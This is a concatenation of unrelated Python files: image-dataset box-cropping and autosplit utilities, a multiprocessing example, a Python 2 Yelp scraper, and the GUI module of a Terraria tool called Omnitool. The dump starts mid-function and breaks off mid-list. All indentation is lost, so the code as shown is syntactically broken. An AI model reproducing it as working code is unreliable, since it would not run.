path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
p4.py
|
import multiprocessing
def evenno(numbers, q):
for n in numbers:
if n % 2 == 0:
q.put(n)
if __name__ == "__main__":
q = multiprocessing.Queue()
p = multiprocessing.Process(target=evenno, args=(range(11), q))
p.start()
p.join()
while q.empty() is False:
print(q.get())
print("Exiting main")
|
main.py
|
import json
#import urllib
#import urllib.parse
import requests
import bs4
import threading
import urllib
import csv
headers = {
'authorization': None,
'cache-control': "no-cache",
}
def chunks(l, n):
for i in xrange(0, len(l), n):
yield l[i:i + n]
def set_api_key(apiKey):
headers['authorization'] = "Bearer " + apiKey
def get_mobile_site(url):
# Gets the mobile site
headers = { 'User-Agent' : 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B137 Safari/601.1'}
for i in range(3):
try:
res = requests.get(url, headers=headers, timeout=10)
if res.status_code == 200:
return res
except:
pass
def get_desktop_site(url):
# Gets the desktop site
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
for i in range(3):
try:
res = requests.get(url, headers=headers, timeout=10)
if res.status_code == 200:
return res
except:
pass
#need the following parameters (type dict) to perform business search.
#params = {'name':'walmart supercenter', 'address1':'406 S Walton Blvd', 'city':'bentonville', 'state':'ar', 'country':'US'}
def search(term, threadCount, location, saveAs="file.csv"):
params = {'term':term, 'location':location}
#param_string = urllib.parse.urlencode(params)
#conn = http.client.HTTPSConnection("api.yelp.com")
x = "address1="
#res = requests.get("https://api.yelp.com/v3/businesses/matches/best?", headers=headers, params=params)
res = requests.get("https://api.yelp.com/v3/businesses/search", headers=headers, params=params)
#res = conn.getresponse()
#data = res.read()
#data = json.loads(data.decode("utf-8"))
data = res.json()
print json.dumps(data, indent=4)
#raw_input("CONTINUE")
a = []
# Iterate over all of the results for this search
results = data["businesses"]
#print(len(results))
listOfPins = chunks(results, int(len(results)/threadCount))
#print len(list(listOfPins))
def process(listOfResults):
for val in listOfResults:
print(val)
# Replace the URL with a valid mobile URL
url = val['url'].replace("https://www.yelp.com", "https://m.yelp.com")
# Grab the site using mobile headers | yelp will redirect if not
res = get_mobile_site(url)
# Parse the mobile site as a bs4 object
page = bs4.BeautifulSoup(res.text, 'lxml')
# Select the "website" button src
buttonInfo = page.select(".js-external-link-action-button")
val['hasWebsite'] = len(buttonInfo) != 0
if len(buttonInfo) == 0:
val['website'] = None
else:
val['website'] = urllib.unquote(str(buttonInfo).partition('" href="')[2].partition('"')[0]).partition('&')[0].partition('?url=')[2]
a.append(val)
#print val.keys()
if val['hasWebsite'] == False:
phone = val['display_phone']
if len(phone) < 2:
phone = "NO PHONE NUMBER"
print("{} | {}".format(val['name'], phone))
#print val['website']
threads = [threading.Thread(target=process, args=(ar,)) for ar in listOfPins]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if saveAs != None:
if len(a) > 0:
g = a[0].keys()
new = [g]
for val in a:
new.append([val.get(v, "") for v in g])
with open(saveAs, "wb") as f:
writer = csv.writer(f)
writer.writerows(new)
return a
|
__init__.py
|
#! python3.4-32
import sys
import os
import multiprocessing
import zlib
import pickle
from importlib import import_module
from urllib.request import urlretrieve
from .shared import cachepath, appdata, __version__
from .loadbar import Bar
from . import render
__author__ = "Fabian Dill"
__credits__ = ["Ijwu", "7UR7L3", "Fabian Dill"]
__maintainer__ = "Fabian Dill"
os.environ["PYGAME_FREETYPE"] = "1"
if not os.path.isdir(appdata):
os.mkdir(appdata)
try:
with open(cachepath, "rb") as f:
cache = pickle.loads(zlib.decompress(f.read()))
except IOError as e:
print("Unable to load cache (" + e.__class__.__name__ + "), creating new cache")
cache = {"worlds": {}, "backup": {}}
with open(cachepath, "wb") as f:
f.write(zlib.compress(pickle.dumps(cache, 2), 9))
except Exception as e:
print("Unable to load cache (" + e.__class__.__name__ + "), creating new cache")
cache = {"worlds": {}, "backup": {}}
with open(cachepath, "wb") as f:
f.write(zlib.compress(pickle.dumps(cache, 2), 9))
if "reset" in sys.argv:
cache = {"worlds": {}}
sys.argv.remove("reset")
if "theme" in cache:
themename = cache["theme"]
else:
themename = "Blue"
if "thumbsize" in cache:
thumbsize = cache["thumbsize"]
else:
thumbsize = (420.0, 120.0)
cache["thumbsize"] = (420, 120)
if "backup" not in cache:
cache["backup"] = {}
if "do_backup" not in cache:
cache["do_backup"] = True
if "columns" not in cache:
cache["columns"] = 3
if "lang" not in cache:
cache["lang"] = "english"
if "version" not in cache:
cache["version"] = __version__
cache["worlds"] = {}
elif cache["version"] < __version__:
print("Newer Omnitool version, resetting world image cache.")
cache["version"] = __version__
cache["worlds"] = {}
from .Language import load_language
lang = load_language(cache['lang'])
if False:
from .Language import english as lang # IDE hook
shared.lang = lang
shared.cache = cache
shared.cores = multiprocessing.cpu_count()
import pygame
from pgu import gui
from .tinterface import *
from .colorlib import walldata, data as colorlib_data
from .tlib import *
import threading
import time
from .pgu_override import MyTheme, MyApp
theme = shared.theme = MyTheme(themename)
import subprocess
import shutil
import sys
import webbrowser
if sys.platform.startswith("win"):
from ctypes import windll
import struct
import tempfile
import json
bit = struct.calcsize("P") * 8
cache_lock = threading.Lock()
def save_cache():
cache_lock.acquire()
d = zlib.compress(pickle.dumps(cache), 9)
with open(shared.cachepath, "wb") as f:
f.write(d)
cache_lock.release()
if len(sys.argv) > 1: # user wants something
def savequit():
import time
time.sleep(3)
save_cache()
pygame.quit()
sys.exit()
if sys.argv[1].split("\\")[-1] == "TEditXna.exe": # install tedit
cache["tedit"] = sys.argv[1]
print("Learned TEdit path: " + sys.argv[1])
savequit()
elif sys.argv[1].split("\\")[-1] == "Terrafirma.exe": # install tedit
cache["terrafirma"] = sys.argv[1]
print("Learned terrafirma path: " + sys.argv[1])
savequit()
myterraria = get_myterraria() # mygames-terraria path
images = myterraria / "WorldImages"
processes = []
if not images.is_dir():
images.mkdir(parents=True)
try:
(myterraria / "Worlds").mkdir()
except:
pass
shutdown = False
def exit_prog(p):
global shutdown
shutdown = True
pygame.quit()
import sys
sys.exit()
shared.exit_prog = exit_prog
def nothing(p):
pass
class GenButton(gui.Button):
def __init__(self, name, gen, width=100, disabled=False):
gui.Button.__init__(self, name, width=width)
self.connect(gui.CLICK, start_proc, bind[gen], True)
self.disabled = disabled
self.blur()
last_gen_start = 0
def start_proc(func, delay=False):
global last_gen_start
if delay:
now = time.time()
if now - last_gen_start < 0.1:
return
last_gen_start = time.time()
if func[1].__class__.__name__ == "list":
p = multiprocessing.Process(target=func[0], name=func[1][0],
args=(func[1][1],))
else:
p = multiprocessing.Process(target=func[0], name=func[1]) # , args = (to_self,))
p.start()
processes.append(p)
class Language(gui.Dialog):
def __init__(self, n=None):
main = gui.Table()
gui.Dialog.__init__(self, gui.Label("Language"), main)
liste = gui.List(200, 150)
langs = ["german", "english", "portuguese", "czech",
"spanish", "french", "norwegian", "japanese",
"danish", "italian", "hungarian", "russian",
"chinese"]
langnames = [lang.capitalize() for lang in langs]
for name, dire in zip(langnames, langs):
liste.add(name, value=dire)
self.liste = liste
self.liste.value = cache["lang"]
main.td(self.liste)
self.open()
def close(self, w=None):
cache["lang"] = self.liste.value
save_cache()
gui.Dialog.close(self, w)
class Settings(gui.Dialog):
def __init__(self, n=None):
main = gui.Table()
gui.Dialog.__init__(self, gui.Label(lang.settings), main)
liste = gui.List(200, 114)
liste.value = themename
themes = "themes"
for dire in os.listdir(themes):
liste.add(str(dire), value=dire)
self.liste = liste
liste = gui.Select()
liste.value = cache["columns"]
for x in (1, 2, 3, 4, 5):
liste.add(str(x), value=x)
self.columns = liste
backupswitch = gui.Switch()
backupswitch.value = cache["do_backup"]
self.backup = backupswitch
sizelist = gui.Select(value=thumbsize)
sizelist.add(lang.none, 0)
sizelist.add(lang.small, (420.0, 120.0))
sizelist.add(lang.medium, (630.0, 180.0))
sizelist.add(lang.large, (840.0, 240.0))
sizelist.add(lang.very_large, (1260.0, 360.0))
self.sizelist = sizelist
main.td(gui.Label(lang.warning, color=(127, 0, 0)), colspan=2)
main.tr()
main.td(gui.Label(lang.theme_select))
main.td(gui.Label(lang.thumbsize))
main.tr()
main.td(self.liste, rowspan=5)
main.td(sizelist)
main.tr()
main.td(gui.Label(lang.world_columns), col=1, row=3)
main.tr()
main.td(self.columns, col=1, row=4)
main.tr()
main.td(gui.Label(lang.mk_backups), col=1, row=5)
main.tr()
main.td(backupswitch, col=1, row=6)
self.open()
def close(self, w=None):
cache["theme"] = self.liste.value
if cache["thumbsize"] != self.sizelist.value:
change = True
else:
change = False
cache["thumbsize"] = self.sizelist.value
cache["do_backup"] = self.backup.value
cache["columns"] = self.columns.value
save_cache()
gui.Dialog.close(self, w)
display_worlds(change)
class Button(gui.Button):
def __init__(self, name, func, args, width=200):
gui.Button.__init__(self, name, width=width)
self.connect(gui.CLICK, func, args)
def open_image(world):
webbrowser.open(str(world.imagepath))
def open_tedit(world):
subprocess.Popen((cache["tedit"], str(world.path)), cwd=os.path.split(cache["tedit"])[0])
def regen_map(world):
if not world.get_worldview():
print("No changes found in world file, rendering skipped.")
def runrender(world, mapping):
if mapping:
megaimage_dir = images / Path(str(world.name))
args = (render.run, megaimage_dir / "index.html",
world.path, True, (world.header, world.pos), megaimage_dir)
p = multiprocessing.Process(target=relay.run_with_browser, name="WorldRender (mapping)", args=args)
else:
args = (world.path, False, (world.header, world.pos))
p = multiprocessing.Process(target=render.run, name="WorldRender", args=args)
p.start()
processes.append(p)
class WorldInteraction(gui.Dialog):
def __init__(self, world):
main = gui.Table()
gui.Dialog.__init__(self, gui.Label(lang.wa_worldactionmenu.format(world.name)), main)
imgopen = Button(lang.wa_imageopen, self.bundle, (open_image, world))
renderopen = Button(lang.wa_renderopen, self.bundle, (runrender, world, False))
updatemap = Button(lang.wa_update, self.bundle, (regen_map, world))
superimg = Button(lang.wa_super, self.bundle, (runrender, world, True))
main.td(imgopen)
main.tr()
main.td(renderopen)
main.tr()
main.td(superimg)
if "tedit" in cache and os.path.exists(cache["tedit"]):
editopen = Button(lang.wa_teditopen, self.bundle, (open_tedit, world))
main.tr()
main.td(editopen)
main.tr()
main.td(updatemap)
self.open()
def close(self, w=None):
gui.Dialog.close(self, w)
def bundle(self, args):
self.close()
args[0](*args[1:])
class World():
aircolor = pygame.Color(200, 200, 255)
groundcolor = pygame.Color(150, 75, 0)
rockcolor = pygame.Color(50, 50, 50)
def __init__(self, path):
self.mapperrunning = threading.Event()
self.path = path
self.imagepath = images / self.path.with_suffix(".png").name
with self.path.open("rb") as f:
self.header, self.multiparts, self.sectiondata = get_header(f)
if self.sectiondata:
self.pos = self.sectiondata["sections"][1]
if f.tell() != self.pos:
print("Warning: Header for world",self.header["name"].decode(),"of different size than expected, errors may occur.")
else:
self.pos = f.tell()
self.name = self.header["name"].decode()
self.size = gui.Label(str(self.header["width"]) + "X" + str(self.header["height"]) + " tiles")
self.label = gui.Label(self.header["name"])
if thumbsize:
self.info = gui.Table(width=thumbsize[0])
else:
self.info = gui.Table(width=420)
self.info.td(self.label, align=-1)
if self.header["hardmode"]:
self.info.td(gui.Label("Hardmode", color=(250, 0, 0)), align=0)
self.info.td(self.size, align=1)
self.raw = pygame.surface.Surface((self.header["width"], self.header["height"]))
self.raw.fill(self.aircolor)
self.thumbsize = thumbsize
if thumbsize:
self.get_thumb()
self.image = gui.Image(self.thumb)
self.image.connect(gui.CLICK,
WorldInteraction,
self)
self.get_worldview()
def get_thumb(self, size=thumbsize):
i_size = self.raw.get_size()
scale = min(size[0] / i_size[0], size[1] / i_size[1])
self.thumb = pygame.transform.rotozoom(self.raw, 0, scale)
def update_thumb(self, size=None):
if size == None:
size = self.thumbsize
i_size = self.raw.get_size()
scale = min(size[0] / i_size[0], size[1] / i_size[1])
i = pygame.transform.rotozoom(self.raw, 0, scale)
self.thumb.blit(i, (0, 0))
def override_thumb(self, size=thumbsize):
i_size = self.raw.get_size()
scale = min(size[0] / i_size[0], size[1] / i_size[1])
self.thumb = pygame.transform.rotozoom(self.raw, 0, scale)
self.image.change_image(self.thumb)
def check_change(self):
if not self.mapperrunning.is_set():
redraw = False
try:
strpath = str(self.path)
if strpath in cache["worlds"] and self.path.stat().st_mtime > cache["worlds"][strpath]["time"]:
redraw = True
except FileNotFoundError: # world happened to be removed between checks
pass
else: # why is there no elif on try?
if redraw:
self.raw.fill(self.aircolor)
self.get_worldview()
def get_worldview(self):
self.mapperrunning.set() # make sure Redrawer knows, that aquisition of this image is in progress
needed = False
try:
if str(self.path) in cache["worlds"]:
worldcache = cache["worlds"][str(self.path)]
if self.path.stat().st_mtime == worldcache["time"]:
i = proxyload(images / self.path.with_suffix('.png').name)
else:
raise IOError("Image is outdated")
else:
cache["worlds"][str(self.path)] = {"time": 0}
raise IOError("Image does not exist")
except IOError:
needed = True
else:
self.raw.blit(i, (0, 0))
self.update_thumb()
save_cache()
if needed:
size = self.raw.get_size()
levels = self.header["groundlevel"], self.header["rocklevel"]
pygame.draw.rect(self.raw, self.groundcolor,
((0, levels[0]),
(size[0], size[1] - levels[0])))
pygame.draw.rect(self.raw, self.rockcolor,
((0, levels[1]),
(size[0], size[1] - levels[1])))
self.update_thumb()
t = PLoader(self)
t.name = "Vanilla-Mapper-%s" % self.header["name"]
t.start()
else:
self.mapperrunning.clear()
return needed
def gen_slices(queue, imgpath, path, start, size, levels, version, multiparts, interval=32):
get_tile = select_tile_getter(version)
with path.open("rb") as f:
f.seek(start)
xworld, yworld = size # read world size from header cache
s = pygame.surface.Surface(size, depth=24)
s.fill((200, 200, 255))
pygame.draw.rect(s, (150, 75, 0),
((0, levels[0]),
(size[0], size[1] - levels[0])))
pygame.draw.rect(s, (50, 50, 50),
((0, levels[1]),
(size[0], size[1] - levels[1])))
buffer = pygame.PixelArray(s)
xstart = 0
while xstart < xworld:
w = min(interval, -xstart + xworld)
for xi in range(xstart, xstart + w): # for each slice
yi = 0
while yi < yworld: # get the tiles
(tile, wall, liquid, multi, wire), b = get_tile(f)
color = None
if not liquid: # liquid == 0 means no liquid
# there could be a liquid and a tile, like a chest and water,
# but I can only set one color to a pixel anyway, so I priotise the tile
if tile == None:
if wall:
if wall in colorlib.walldata:
color = colorlib.walldata[wall]
else:
color = (wall, wall, wall)
elif tile in colorlib.data:
color = colorlib.data[tile] # if colorlib has a color use it
else:
tile = min(255, tile)
color = (tile, tile, tile) # make a grey otherwise
elif liquid > 512:
color = (245, 219, 27)
elif liquid > 256:
color = (150, 35, 17)
else: # 0>x>256 is water, the higher x is the more water is there
color = (19, 86, 134)
if color:
buffer[xi, yi:yi + b] = color
yi += b
sub = buffer[xstart:xstart + w, ::].make_surface()
queue.put([w, pygame.image.tostring(sub, "RGB")])
xstart += w
del (buffer)
queue.close()
pygame.image.save(s, imgpath)
class PLoader(threading.Thread):
def __init__(self, world):
threading.Thread.__init__(self)
self.world = world
def run(self):
world = self.world
wx, wy = size = (world.header["width"], world.header["height"])
levels = world.header["groundlevel"], world.header["rocklevel"]
xi = 0
version = world.header["version"]
pos = world.pos
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=relay.launch_gen_slices, args=(
queue, str(self.world.imagepath), world.path, pos, size, levels, version, world.multiparts))
p.start()
while xi < wx:
x, imgdata = queue.get()
surface = pygame.image.fromstring(imgdata, (x, wy), "RGB")
while world.raw.get_locked(): # if window is beeing rezized, keep waiting
time.sleep(0.1)
world.raw.blit(surface, (xi, 0))
world.update_thumb()
world.image.repaint()
xi += x
p.join() # wait until the image file is saved
cache["worlds"][str(world.path)]["time"] = world.path.stat().st_mtime
save_cache()
world.mapperrunning.clear()
def full_split(root):
split = list(os.path.split(root))
rsplit = [split[1]]
while split[1] != "":
split = os.path.split(split[0])
rsplit.append(split[1])
rsplit = rsplit[:-1]
rsplit.append(split[0])
rsplit.reverse()
return rsplit
class Info(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
global shutdown
import time
while 1:
if shutdown: sys.exit()
threads = threading.enumerate()
x = len(threads)
unneeded = ("SockThread", "Info")
dead = False
for thread in threads:
if thread.name == "MainThread":
if not (thread.is_alive()): dead = True
elif (thread.name) not in unneeded:
x -= 1
if x <= 2 and dead and len(processes) == 0:
if not shutdown:
print("All important threads have exited, full shutdown in 15 seconds")
time.sleep(15)
sys.exit()
# print ("alive")
dead = []
for p in processes:
# print (p.exitcode, p.is_alive())
# print (p)
if not p.is_alive(): dead.append(p)
for d in dead:
d.join()
processes.remove(d)
time.sleep(1)
sys.exit()
class Backupper(threading.Thread):
"""Thread handling background backups - quits when everything is backed up"""
def __init__(self):
threading.Thread.__init__(self)
def backup(self, path, dest):
t = path.stat().st_mtime
if path not in cache["backup"] or t != cache["backup"]:
s = time.strftime("%SS_%MM_%HH_%dD_%b_%YY.", time.localtime(t))
shutil.copy(str(path), str(dest / (s + path.name)))
cache["backup"][str(path)] = t
def run(self):
dest = myterraria / "WorldsBackup"
if not dest.is_dir():
dest.mkdir()
# source = os.path.join("C:\program files (x86)\\steamapps\common\Terraria")
worlds = list(get_worlds())
for path in worlds:
self.backup(path, dest)
if len(worlds) == 0:
print("BackUpper has found no worlds")
dest = myterraria / "PlayersBackup"
if not dest.is_dir():
dest.mkdir()
try:
players = get_players()
for path in players:
self.backup(path, dest)
except FileNotFoundError:
print("BackUpper has found no player files")
print("Backups made")
sys.exit()
save_cache()
class Redrawer(threading.Thread):
"""Thread that waits for changes in the world folder and triggers a menu redraw when necessary"""
def __init__(self):
threading.Thread.__init__(self)
self.name = "Redrawer"
self.daemon = True
def run(self):
global worlds
new = []
dropped = []
while 1:
time.sleep(1)
if dropped:
worlds = list(filter(lambda world: world.path not in dropped, worlds))
for world in worlds:
world.check_change()
if new:
for name in new:
get_world(name, worlds)
if new or dropped:
print("World File Change Detected!")
app.queue.append((display_worlds,))
names = set(get_worlds())
new = names - set(worldnames)
dropped = set(worldnames) - names
if new:
worldnames.extend(new)
if dropped:
for w in dropped:
worldnames.remove(w)
class Updater(threading.Thread):
ziploc = os.path.join(appdata, "tImages.zip")
verloc = os.path.join(appdata, "tImages.json")
def __init__(self, update):
threading.Thread.__init__(self)
self.name = "Updater"
self.update = update
def run(self):
import urllib.request
import json
f = urllib.request.urlopen("http://dl.dropbox.com/u/44766482/ot_updater/ot_version.json").read()
js = json.loads(f.decode())
verint = js["omnitool"]
if verint > __version__:
from .version import Version
text = gui.Label("Version " + Version(verint).__repr__() + lang.available, color=(255, 0, 0))
self.update.td(text, align=-1)
text2 = gui.Label(lang.changelog, color=(100, 100, 255))
self.update.td(text2, align=1)
text2.connect(gui.CLICK,
webbrowser.open,
"http://adf.ly/686481/omnitool-github-releases")
text.connect(gui.CLICK,
webbrowser.open,
"http://adf.ly/686481/omnitool-github-releases")
if not os.path.exists("tImages.zip") or self.check_texture_version(js["tImages"]): # newer version available
args = (r"http://dl.dropbox.com/u/44766482/ot_updater/tImages.zip",
str(self.ziploc),
"Texture Download",
False)
p = multiprocessing.Process(target=remote_retrieve, name="tImages Retriever", args=args)
p.start()
p.join()
import json
with open(self.verloc, "w") as f:
json.dump({"version": js["tImages"]}, f)
print("Updater done")
sys.exit()
def check_texture_version(self, remote_texture_version):
if os.path.exists(self.ziploc) and os.path.exists(self.verloc):
import json
with open(self.verloc) as f:
js = json.load(f)
if js["version"] >= remote_texture_version:
return False
return True
def remote_retrieve(source, target, name, abortable=True):
"""
Retrieves remote file, showing a pygame progressbar for progress.
As there can only be one pygame window per process, it is recommended to run this as a subprocess.
:param source: URL source of file
:param target: local target location
:param name: caption of pygame window
:return:
"""
bar = Bar(caption=name, abortable=abortable)
def reporthook(blocknum, blocksize, totalsize):
read = blocknum * blocksize
if totalsize > 0:
percent = read * 100 / totalsize
else: # total size is unknown
percent = 0
bar.set_progress(percent, name + " {:d}%".format(int(percent)))
urlretrieve(source, target, reporthook)
def proxyload(path):
with path.open("rb") as f:
d = pygame.image.load(f, path.suffix[1:])
return d
if "directlaunch" in sys.argv:
if cache["do_backup"]:
b = Backupper()
b.name = "Backup"
b.daemon = False
b.start()
webbrowser.open("steam://rungameid/105600")
sys.exit()
def get_world(world, worlds):
try:
w = World(world)
except Exception as e:
print("Error loading world %s:" % world)
import traceback
traceback.print_exc()
else:
worlds.append(w)
def open_dir(direc):
direc = str(direc)
if sys.platform == 'win32':
subprocess.Popen(['explorer', direc], shell=True)
elif sys.platform == 'darwin':
subprocess.Popen(['open', direc])
else:
try:
subprocess.Popen(['xdg-open', direc])
except OSError:
pass
plugins_ = []
def get_plugins():
if "." not in sys.path:
sys.path = ["."] + sys.path # use plugins in the folder, instead of library.zip - if accidentally included
for file in os.listdir("plugins"):
if file[-3:] == ".py" and file != "plugins.py" and file != "__init__.py":
try:
plugin = import_module('plugins.' + file[:-3], package="omnitool")
except:
import traceback
print("Error importing plugin %s:" % file[:-3])
traceback.print_exc()
else:
name, ptype = plugin.config["name"], plugin.config["type"]
plugins_.append((file[:-3], name, ptype))
return plugins_
def plug_save(Plug):
if hasattr(Plug, "loadingbar"):
# we have a loadingbar to attend to
loadcallback = Plug.loadingbar
else:
loadcallback = None
f = tempfile.SpooledTemporaryFile(10000000) # 10 megabyte ram file
set_header(f, Plug.header)
try:
Plug.tiles[0]
except:
Plug.tiles.seek(0)
f.write(Plug.tiles.read())
else:
set_tiles(f, Plug.tiles, Plug.header, True, loadcallback)
set_chests(f, Plug.chests)
set_signs(f, Plug.signs)
[set_npc(f, npc) for npc in Plug.npcs]
set_npc(f, None)
set_npc_names(f, Plug.names)
set_trail(f, (1, Plug.header["name"], Plug.header["ID"]))
with get_next_world(Plug.header["name"]).open("wb") as g:
f.seek(0)
g.write(f.read())
def launch_plugin(plug):
import importlib
if "." not in sys.path:
sys.path = ["."] + sys.path # use plugins in the folder, instead of library.zip - if accidentally included
Plugin = importlib.import_module("plugins." + plug[0], "omnitool")
if plug[2] == "receiver":
worlds = list(get_worlds())
from . import plugingui
w = plugingui.run(worlds, Plugin, "rec")
if w:
with w.open("rb") as f:
Plug = Plugin.Receiver()
f.buffer = [0]
header = get_header(f)[0]
print("sending header")
if Plug.rec_header(header) != False:
get_tile = iter_get_tile(select_tile_getter(header["version"]))(f)
tiles = []
for xi in range(header["width"]): # for each slice
tiles.append([next(get_tile) for _ in range(header["height"])])
print("sending tiles")
if Plug.rec_tiles(tiles) != False:
if Plug.rec_chests(chests=[get_chest(f) for x in range(1000)]) != False:
if Plug.rec_signs(signs=[get_sign(f) for x in range(1000)]) != False:
npcs = []
while 1:
npc = get_npc(f)
if not npc:
break
else:
npcs.append(npc)
names = get_npc_names(f)
trail = get_trail(f)
if trail[1] != header["name"] or trail[2] != header["ID"]:
print("Warning, World signature test not passed")
Plug.rec_npcs(npcs, names)
if hasattr(Plug, "run"):Plug.run()
else:
print("No world selected, aborting execution")
elif plug[2] == "generator":
Plug = Plugin.Generator()
Plug.run()
plug_save(Plug)
elif plug[2] == "program":
Plug = Plugin.Program()
Plug.run()
elif plug[2] == "transplant":
worlds = list(get_worlds())
import plugingui
w1, w2 = plugingui.run(worlds, Plugin, "trans")
with w2.open("rb") as f:
Plug = Plugin.Transplant()
f.buffer = [0]
header = get_header(f)[0]
Plug.rec_header(header)
get_tile = iter_get_tile(select_tile_getter(header["version"]))(f)
tiles = []
for xi in range(header["width"]): # for each slice
tiles.append([next(get_tile) for _ in range(header["height"])])
Plug.rec_tiles(tiles)
Plug.rec_chests(chests=[get_chest(f) for x in range(1000)])
Plug.rec_signs(signs=[get_sign(f) for x in range(1000)])
npcs = []
while 1:
npc = get_npc(f)
if not npc:
break
else:
npcs.append(npc)
names = get_npc_names(f)
trail = get_trail(f)
if trail[1] != header["name"] or trail[2] != header["ID"]:
print("Warning, World signature test not passed")
Plug.rec_npcs(npcs, names)
Plug.run()
with w1.open("rb") as f:
# Plug = Plugin.Transplant()
f.buffer = [0]
header = get_header(f)[0]
if Plug.rec_header(header) != False:
tiles = []
for xi in range(header["width"]): # for each slice
tiles.append([get_tile(f) for tile in range(header["height"])])
if Plug.rec_tiles(tiles) != False:
if Plug.rec_chests(chests=[get_chest(f) for x in range(1000)]) != False:
if Plug.rec_signs(signs=[get_sign(f) for x in range(1000)]) != False:
npcs = []
while 1:
npc = get_npc(f)
if not npc:
break
else:
npcs.append(npc)
names = get_npc_names(f)
trail = get_trail(f)
if trail[1] != header["name"] or trail[2] != header["ID"]:
print("Warning, World signature test not passed")
Plug.rec_npcs(npcs, names)
if hasattr(Plug, "run"): Plug.run()
plug_save(Plug)
elif plug[2] == "modifier":
worlds = list(get_worlds())
from .plugingui import run as run_plugingui
w = run_plugingui(worlds, Plugin, "mod")
with w.open("rb") as f:
Plug = Plugin.Modifier()
f.buffer = [0]
header = get_header(f)[0]
Plug.rec_header(header)
get_tile = iter_get_tile(select_tile_getter(header["version"]))(f)
tiles = []
for xi in range(header["width"]): # for each slice
tiles.append([next(get_tile) for _ in range(header["height"])])
Plug.rec_tiles(tiles)
Plug.rec_chests(chests=[get_chest(f) for x in range(1000)])
Plug.rec_signs(signs=[get_sign(f) for x in range(1000)])
npcs = []
while 1:
npc = get_npc(f)
if not npc:
break
else:
npcs.append(npc)
names = get_npc_names(f)
trail = get_trail(f)
if trail[1] != header["name"] or trail[2] != header["ID"]:
print("Warning, World signature test not passed")
Plug.rec_npcs(npcs, names)
Plug.run()
plug_save(Plug)
else:
print("Unrecognized plugin type, aborting execution")
print(plug[1] + " is done")
sys.exit()
from .relay import launch_plugin as relay_launch_plugin
def run():
global app
global worldnames
global worlds
global display_worlds
try:
loc = myterraria / "Game Launcher" / "omnitool.gli3"
data = {
"appAuthor": __author__ + " (Berserker66)",
"appName": "Omnitool",
"appPath": os.path.abspath(sys.argv[0]),
"appVersion": __version__.__repr__()
}
with loc.open("wt") as f:
f.write(json.dumps(data, indent=4))
except:
import traceback
print("Could not register to GameLauncher 3. Maybe it just isn't installed. Exception:")
traceback.print_exc()
try:
worldnames = list(get_worlds())
except FileNotFoundError:
worldnames = []
print("Omnitool has found no worlds")
use_override = True
if use_override:
app = MyApp(theme=theme)
else:
import pgu
app = pgu.gui.App(theme=theme)
worlds = []
ts = [threading.Thread(target=get_world, args=(world, worlds)) for world in worldnames]
tuple(t.start() for t in ts)
pad = 10
x = 0
data = [
("Omnitool/" + lang.settings, Settings, None),
("Omnitool/" + "Language", Language, None),
("Omnitool/" + lang.report_issue, webbrowser.open, "https://github.com/Berserker66/omnitool/issues"),
("Omnitool/" + lang.exit, exit_prog, None),
(lang.start + "/" + lang.terraria, webbrowser.open, "steam://rungameid/105600"),
]
if "tedit" in cache and os.path.exists(cache["tedit"]):
def run_tedit(n):
subprocess.Popen(cache["tedit"], cwd=os.path.split(cache["tedit"])[0])
data.append((lang.start + "/TEdit", run_tedit, None))
if "terrafirma" in cache:
if os.path.exists(cache["terrafirma"]):
def run_terrafirma(n):
subprocess.Popen(cache["terrafirma"], cwd=os.path.split(cache["terrafirma"])[0])
data.append((lang.start + "/Terrafirma", run_terrafirma, None))
data.extend([
(lang.open + "/" + lang.imagefolder, open_dir, images),
(lang.open + "/" + lang.backupfolder, open_dir, myterraria / "WorldsBackup"),
(lang.open + "/" + lang.themes, open_dir, Path.cwd() / "themes"),
(lang.visit + "/" + lang.donate, webbrowser.open,
r"https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=JBZM8LFAGDK4N"),
(lang.visit + "/Patreon", webbrowser.open,
r"https://www.patreon.com/Berserker55"),
(lang.visit + "/" + lang.homepage, webbrowser.open,
r"http://forums.terraria.org/index.php?threads/omnitool-world-creation-mapping-backups-and-more.14664/"),
(lang.visit + "/" + lang.wiki, webbrowser.open, "http://terraria.gamepedia.com/Terraria_Wiki"),
(lang.visit + "/GameLauncher GUI", webbrowser.open,
